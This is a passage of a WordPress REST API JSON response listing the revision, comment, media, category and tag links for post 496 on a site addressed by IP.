p-json\/wp\/v2\/comments?post=496"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/496\/revisions"}],"predecessor-version":[{"id":497,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/496\/revisions\/497"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=496"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=496"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=496"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}